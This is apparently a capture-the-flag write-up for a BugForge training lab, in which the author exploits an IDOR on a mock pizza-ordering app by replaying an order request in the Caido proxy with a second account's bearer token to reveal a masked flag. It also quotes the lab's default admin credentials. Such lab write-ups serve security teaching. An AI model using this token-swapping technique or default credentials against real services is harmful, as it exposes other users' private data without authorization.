BugForge Write-Up 3/22/2026

• BugForge Daily Challenge 3/22/2026 - Cheesy Does It 

Hint: IDOR. Can you view things that don't belong to you? 

Note: 

@PawPawHacks/Tom Fieber:  

If there is an admin account active for a lab, the credentials are admin:admin123 

• I launched Caido.

  
  

• I checked to see if there was an admin login using the set/known creds, and there was. I logged out of that for now.

  
  

• The challenge hint stated this was an IDOR challenge and following along with the @PawPawHacks/Tom Fieber walkthrough, he said that with an IDOR you pretty much always need to create two accounts, so that's the first thing I did. To create two accounts, I made one user account (Tester1), and then launched a "New private window" in my browser and created a second user account (Tester2). Once logged in, I was taken to an app that appeared to behave a lot like an online pizza shop: 

• Next, I had read a hint in the BugForge Discord from @PawPawHacks/Tom Fieber: "See if there’s any spot where you might be able to see something that 'belongs' to another user"...so when I looked at all the drop-down menus on the Website, there were: Menu, Build Pizza, Orders, Cart, and Profile. It seemed to me that out of all of those, "Orders" might be that one thing to home-in on.

  
  

• Using the first user account I'd created (Tester1), I put together an order, placed it in my cart, and then checked it out...noting what the URL was for the order number: https://lab-1774214756286-0h2khg.labs-app.bugforge.io/orders/1

• Next, over in my Caido proxy window, I found the traffic for the order I had just placed: "GET /api/orders/1", so I highlighted that line of traffic in the proxy, then right-clicked and selected "Send to Replay -> Default Collection": 

• Now, over in the "Replay" tab, I hit the red "Send" button so that I had a baseline of what the traffic "Response" looked like:

• Next, still in the "Replay" tab, in the "Request" pane, I swapped the Authorization Token for my (Tester1) with the one from my other (Tester2) account. So I changed the following from:

Tester1:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJUZXN0ZXIxIiwiaWF0IjoxNzc0MjE1MDc4fQ.FSwdMUPvesZfHBceDjxrS5XNEoMRVjZbMVNY3_DL04g

to:

Tester2:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NSwidXNlcm5hbWUiOiJUZXN0ZXIyIiwiaWF0IjoxNzc0MjE1MTUwfQ.DAEjQX9H4RoeNesHOPZjduXrpXBP8eAqT24jCysPwhU

Or another view: 

Tester1: 

{ "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJUZXN0ZXIxIiwiaWF0IjoxNzc0MjE1MDc4fQ.FSwdMUPvesZfHBceDjxrS5XNEoMRVjZbMVNY3_DL04g", "user": { "id": 4, "username": "Tester1", "email": "Tester1@AOL.com", "full_name": "Tester One", "phone": "2125551212", "address": "1313 Mockingbird Lane" } }

to: 

Tester2: 

{ "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NSwidXNlcm5hbWUiOiJUZXN0ZXIyIiwiaWF0IjoxNzc0MjE1MTUwfQ.DAEjQX9H4RoeNesHOPZjduXrpXBP8eAqT24jCysPwhU", "user": { "id": 5, "username": "Tester2", "email": "Tester2@AoL.com", "full_name": "Tester Two", "phone": "2125551212", "address": "1313 Mockingbird Lane" } }

• Now, when I hit the red "Send" button again, I get the flag!

}], "flag": "bug{********************************}" 

}

##### End of Report #####